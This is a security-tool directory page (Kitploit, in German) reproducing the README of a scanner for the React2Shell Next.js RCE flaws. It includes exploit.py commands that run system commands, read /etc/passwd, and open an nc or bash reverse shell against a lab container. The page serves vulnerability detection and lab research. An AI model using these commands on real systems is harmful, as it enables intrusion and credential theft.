Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
Tools/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
Management von Indicators of Compromise (IOC)SchwachstellenscannerExploitationWebanwendungs-ExploitationBedrohungsanalyseSubdomain-EnumerationLernen & BildungPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Labs & Praxis
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

Repository anzeigen
211vor 9 MonatenNoch nicht geprüft
Teilen

React2Shell Enterprise Scanner

Hochauflösender Schwachstellenscanner für CVE-2025-55182 und CVE-2025-66478 - Remote Code Execution-Schwachstellen in React Server Components / Next.js.

📖 Für eine detaillierte technische Analyse, Exploit-Mechanismen und IOC-Daten siehe SECURITY-RESEARCH.md


⚠️ HAFTUNGSAUSSCHLUSS

Dieses Werkzeug wird NUR für BILDUNGSZWECKE und AUTORISIERTE SICHERHEITSTESTS bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Verwenden Sie diese Werkzeuge nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben. Die Autoren übernehmen keine Haftung für Missbrauch.


🚨 Schwachstellenübersicht

CVEBeschreibungCVSS
CVE-2025-55182React Server Components Unsicheres Deserialisieren RCE9.8 Kritisch
CVE-2025-66478Next.js Server Actions RCE9.8 Kritisch

Betroffene Pakete:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

Behobene Versionen:

  • 19.0.1, 19.1.2, 19.2.1 (für alle Pakete)

✨ Funktionen

  • Multi-Ziel-Eingabe: Einzelne URL, Hostdateien, CIDR-Bereiche, IP-Bereiche
  • Subdomain-Erkennung: Automatische Erkennung von Subdomains
  • Technologie-Fingerprinting: Erkennung von Next.js vor dem Test
  • Sicherer Erkennungsmodus: Seitenkanal-Erkennung ohne Codeausführung
  • RCE-Verifizierung: Arithmetik-basierter Proof of Concept
  • IOC-Korrelation: Überprüfung auf bekannte bösartige Infrastruktur
  • Phoenix Security-Integration: Hochladen von Ergebnissen auf die Phoenix-Plattform
  • Gleichzeitiges Scannen: Multithreaded für Skalierung

📦 Installation

Mit uv (empfohlen)

# No installation needed - uv handles dependencies
uv run react2shell-scanner -u https://example.com

Mit pip

pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 Verwendung

Basis-Scan

# Single URL
python3 react2shell-scanner -u https://example.com

# Safe mode (no RCE execution)
python3 react2shell-scanner -u https://example.com --safe-check

# From host file
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# CIDR range
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Multiple CIDR ranges
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

Erweitertes Scannen

# Subdomain enumeration
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Custom subdomain wordlist
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Custom paths
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Skip fingerprinting (scan everything)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verbose with SSL disabled
python3 react2shell-scanner -u https://example.com -k -v

Phoenix Security-Integration

# Upload findings to Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Debug mode (save payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Upload all results (not just vulnerabilities)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 Konfiguration

Phoenix Security-Konfiguration

Erstellen Sie .phoenix.config:

[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

Oder Umgebungsvariablen verwenden:

export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 Testlabor

Eine Docker-basierte Testumgebung ist enthalten. Siehe Lab-instructions-sample.md für eine Kurzreferenz.

# Start lab
cd test-lab/lab
docker-compose up -d

# Services:
# - Vulnerable: http://localhost:3011
# - Patched:    http://localhost:3012

# Test vulnerable instance (safe evidence collection)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Test patched instance  
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Run full demo
./test-and-demo.sh --full-demo

⚠️ Hinweis: Exploit-Befehle (z. B. exploit.py -c "whoami") lösen TATSÄCHLICHE RCE aus. Nur für Forschungszwecke auf lokalen Docker-Containern verwenden.

💻 Exploit-Werkzeug (exploit.py)

Führen Sie Befehle auf verwundbaren Zielen aus. Erfordert Python 3.11+

Installation

cd test-lab
pip3.11 install -r requirements.txt
# Or: pip3.11 install rich-click fake-useragent rich requests

Beispiele für Befehlsausführung

# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Output: 99e28775bf80 (container ID)

# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Application reconnaissance
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Output: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Network information
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Process enumeration
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

Reverse Shell (Erweitert)

# Get Docker network gateway
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Start listener (in another terminal)
nc -lvnp 4444

# Launch reverse shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Available payload types: nc, nc-mkfifo, sh, bash, perl

Exploit-Optionen

OptionBeschreibung
-u, --urlZiel-URL (erforderlich)
-c, --cmdAuszuführender Befehl
-r, --reverseReverse-Shell-Modus aktivieren
-l, --lhostListener-Host für Reverse Shell
-p, --lportListener-Port für Reverse Shell
-P, --payloadPayload-Typ: nc, nc-mkfifo, sh, bash, perl
--timeoutRequest-Timeout (Standard: 10s)

📊 Ausgabeformate

Konsolenausgabe

[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com
Tool herunterladen